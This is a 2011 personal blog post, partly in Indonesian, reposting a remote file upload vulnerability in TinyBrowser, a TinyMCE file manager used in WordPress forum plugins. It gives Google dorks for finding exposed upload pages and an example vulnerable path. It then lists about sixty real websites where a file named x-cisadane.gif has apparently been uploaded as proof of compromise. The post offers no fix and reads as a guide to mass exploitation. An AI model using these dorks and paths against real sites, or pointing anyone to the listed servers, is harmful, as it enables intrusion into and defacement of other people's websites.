.: Dee Personal Blog :.

Subtitle

Blog

TinyBrowser Remote File upload Vulnerability

Posted on July 20, 2011 at 11:20 AM

 

============================================

TinyBrowser Remote File upload Vulnerability

============================================

 

 

************************************************************

** TinyBrowser Remote File upload Vulnerability

************************************************************

** Prodcut : TinyBrowser

** Home : www.dz4all.com/cc

** Vunlerability : Remote File upload

** Risk : High

** Dork : inurl:"tinybrowser.php?"

************************************************************

** Discovred by : Ra3cH

** From : Algeria

** Contact : [email protected]

** *********************************************************

************************************************************

** Dorks By Ra3cH

** http://[PATH]/tinybrowser/upload.php?type=

** Dorks By Dwl X-Cisadane

** For WordPress CMS : inurl:/tinybrowser/upload.php

** For Non-WordPress CMS/Others CMS : intitle:"TinyBrowser :: Upload

************************************************************

** Exemple:

** http://[site]/wp-content/plugins/simple-forum/editors/tinymce/plugins/tinybrowser/upload.php?type=

************************************************************

 


TinyBrowser adalah sebuah fasilitas dari TinyMCE (Editor pada CMS) yang digunakan untuk manejemenisasi file, misalnya : pengunggahan file. TinyBrowser ini dipakai pada beberapa CMS, salah satunya : WordPress. Salah satu Plugins pada WordPress yang berupa Forum, menggunakan TinyBrowser. Dengan adanya Upload Vulnerability, maka peretas bisa mengupload berkas berupa gambar, teks maupun html (tergantung konfigurasi webnya).

 


Hasil (Gabungan antara WordPress & Non-WordPress)

http://writers-well.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.mosoq-ayllu.org.pe/wp-content/forum-image-uploads//x-cisadane.gif

http://www.britishfencing.com/uploads/images/x-cisadane.gif

http://www.abracadabrasocialmedia.com/new/wp-content/forum-image-uploads//x-cisadane.gif

http://www.suwwweb.com/como/images/stories/x-cisadane.gif

http://www.onlinechessapp.com/blog/wp-content/forum-image-uploads//x-cisadane.gif

http://dmlmortgage.com/useruploads/images/x-cisadane.gif

http://www.speedfeet.org/wp-content/forum-image-uploads//x-cisadane.gif

http://qbicamphawa.com/upload/users/image/x-cisadane.gif

http://writers-well.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.keithjarrett.org/wp-content/forum-image-uploads//x-cisadane.gif

http://ci.wheeler.or.us/wp-content/forum-image-uploads//x-cisadane.gif

http://www.portlandoic.org/useruploads/images/x-cisadane.gif

http://www.colegioamparosurubim.com.br/uploads/images/x-cisadane.gif

http://oh-stickers.com/Ohblogdeco/wp-content/forum-image-uploads//x-cisadane.gif

http://www.bookgenie.in/useruploads/images/x-cisadane.gif

http://www.messofmusic.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.swoopers.org/wp-content/forum-image-uploads//x-cisadane.gif

http://caravanstv.com/members/wp-content/forum-image-uploads//x-cisadane.gif

http://www.handmadenews.org/hmnul/images/x-cisadane.gif

http://www.2d6.org/wp-content/forum-image-uploads//x-cisadane.gif

http://www.votreregard.fr/forum/wp-content/forum-image-uploads//x-cisadane.gif

http://longmontledger.com/wp-content/forum-image-uploads//x-cisadane.gif

http://reelsaltfish.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.oksup.com/wp-content/forum-image-uploads//x-cisadane.gif

http://menofthewestguild.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.shawnwilkes.com/wp-content/plugins/simple-forum/forum/image-uploads//x-cisadane.gif

http://www.mojacarsol.com/static/fotos/contenido/x-cisadane.gif

http://scottishcoastalrowing.org/wp-content/forum-image-uploads//x-cisadane.gif

http://full-draw.com/wp-content/forum-image-uploads//x-cisadane.gif

http://1nwliving.com/useruploads/images/x-cisadane.gif

http://www.wavers.it/wp-content/forum-image-uploads//x-cisadane.gif

http://www.oakseedessaycontest.com/wp-content/forum-image-uploads//x-cisadane.gif

http://backcountryskiingcanada.com/forums/wp-content/forum-image-uploads//x-cisadane.gif

http://www.banphemarket.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.fenysziget.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.candytreez.com/main/wp-content/forum-image-uploads//x-cisadane.gif

http://battocentre.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.bnaichayim.com/site/wp-content/forum-image-uploads//x-cisadane.gif

http://stripshow.monkeylaw.org/wp-content/forum-image-uploads/x-cisadane.gif

http://gbefraternity.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.faraak.sk/wp-content/forum-image-uploads/x-cisadane.gif

http://www.ankarabote.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.id-pixel.net/xiiijapan/newblog2/wp-content/forum-image-uploads//x-cisadane.gif

http://www.bilardshop.pl/bilardshop/uploads/x-cisadane.gif

http://www.nvshv.nl/seh/upload/Image/x-cisadane.gif

http://dotwa.org.au/wp-content/forum-image-uploads//x-cisadane.gif

http://www.utopod.com/wp-content/forum-image-uploads//x-cisadane.gif

http://www.montanhismocaparao.com.br/upload/image/x-cisadane.gif

http://www.olar-group.ro/images/imguploads/x-cisadane.gif

http://www.ivetijardovica.hr/wp-content/forum-image-uploads//x-cisadane.gif

http://www.amarantbakkers.nl/useruploads/images/x-cisadane.gif

http://www.damnes.be/wp-content/forum-image-uploads//x-cisadane.gif

http://dkbmuraszemenye.hu/wp-content/forum-image-uploads//x-cisadane.gif

http://neja.si/wp-content/forum-image-uploads//x-cisadane.gif

http://www.elperiodico.com.co/x-cisadane.gif

http://www.mandinga.ro/images/imguploads/x-cisadane.gif

http://rg-fails.iz.rs/wp-content/forum-image-uploads//x-cisadane.gif

http://www.funerali.org/wp-content/forum-image-uploads//x-cisadane.gif

http://www.termopanebuftea.ro/images/imguploads/x-cisadane.gif

http://matricazz.hu/files/images/x-cisadane.gif

http://www.irscl.com/president/wp-content/forum-image-uploads//x-cisadane.gif


 

Referensi : http://1337day.com/exploits/12340

Categories: Exploit

Post a Comment

Oops!

Oops, you forgot something.

Oops!

The words you entered did not match the given text. Please try again.

You must be a member to comment on this page. Sign In or Register

0 Comments